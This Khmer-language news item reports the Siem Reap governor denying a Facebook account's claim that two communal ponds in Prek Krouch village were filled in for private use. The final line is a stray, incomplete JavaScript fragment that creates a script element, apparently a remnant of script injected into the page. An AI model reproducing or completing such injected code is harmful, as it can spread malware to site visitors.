លោក ឃឹម ប៊ុនសុង អភិបាលខេត្តសៀមរាប៖ ពុំមានការលុបស្រះទឹករួម២កន្លែង ដូចដែលគណនីឈ្មោះ Catun Man លើកឡើងនោះទេ
ខេត្តសៀមរាប៖ ឯកឧត្តម ឃឹម ប៊ុនសុង អភិបាលខេត្តសៀមរាប សូមជម្រាបជូនសាធារណជនទាំងអស់ ជាពិសេសប្រជាពលរដ្ឋដែលរស់នៅក្នុងភូមិព្រែកក្រូច សង្កាត់ក្របីរៀល ក្រុងសៀមរាប អោយបានជ្រាបថា៖ ក្រោយពីទទួលបាននូវ សំណូមពររបស់ប្រជាពលរដ្ឋ តាមរយៈបណ្តាញសង្គមហ្វេសប៊ុកដែលមានគណនីឈ្មោះ Catun Man តំណាង ៩០គ្រួសារ បាន រាយការណ៍ថា មានករណីរួមគំនិតគ្នា ដោយលុបស្រះទឹករួម ២កន្លែង (ត្រពាំងត្រាវទ្រាំង និងត្រពាំងទទឹម ) បំណងយកជា ទ្រព្យផ្ទាល់ ខ្លួននៅក្នុងភូមិព្រែកក្រូច សង្កាត់ក្របីរៀល ក្រុងសៀមរាប កាលពីថ្ងៃទី២៩ ខែមិថុនា កន្លងទៅនេះ ។
តាមការបញ្ជាក់របស់ ឯកឧត្តម ឃឹម ប៊ុនសុង ថាលោកបាន ចាត់ក្រុមការងារអោយចុះដើម្បីពិនិត្យស្រាវជ្រាវទីតាំងជាក់ស្ដែង ២លើក និងសាកសួរព័ត៌មានពីប្រជា ពលរដ្ឋដែររស់នៅក្នុងភូមិនោះបានអោយដឹងថា៖ ពុំមានករណីនេះ កើតមានឡើងនៅក្នុងភូមិរបស់ពួក គាត់ឡើយ ហើយពួកគាត់ក៏មិនបានសំណូមពរទៅអ្នកណាអោយធ្វើជាតំណាងរបស់ពួកគាត់ដើម្បីតវ៉ា ឬប្តឹងអ្វីនោះដែរ។
ទន្ទឹមនឹងនេះ ឯកឧត្តម ឃឹម ប៊ុនសុង សំណូមពរដល់សាធារណជន និងបងប្អូនប្រជាពលរដ្ឋទាំងអស់ ដែលរស់នៅក្នុងខេត្តសៀមរាប សូមមេត្តាផ្ដល់ព័ត៍មានពិតប្រាកដ និងជាក់លាក់ ជៀសវាងការភ័ណ្ឌច្រឡំដូចករណីខាងលើនេះ ដើម្បីបង្កភាពងាយស្រួលដល់ អាជ្ញា ធរខេត្ត ក្នុងការឆ្លើយតប និងដោះស្រាយរាល់សំណូមពររបស់ប្រជាពលរដ្ឋអោយបានពិតប្រាដក។
var d=document;var s=d.createElement(‘script’);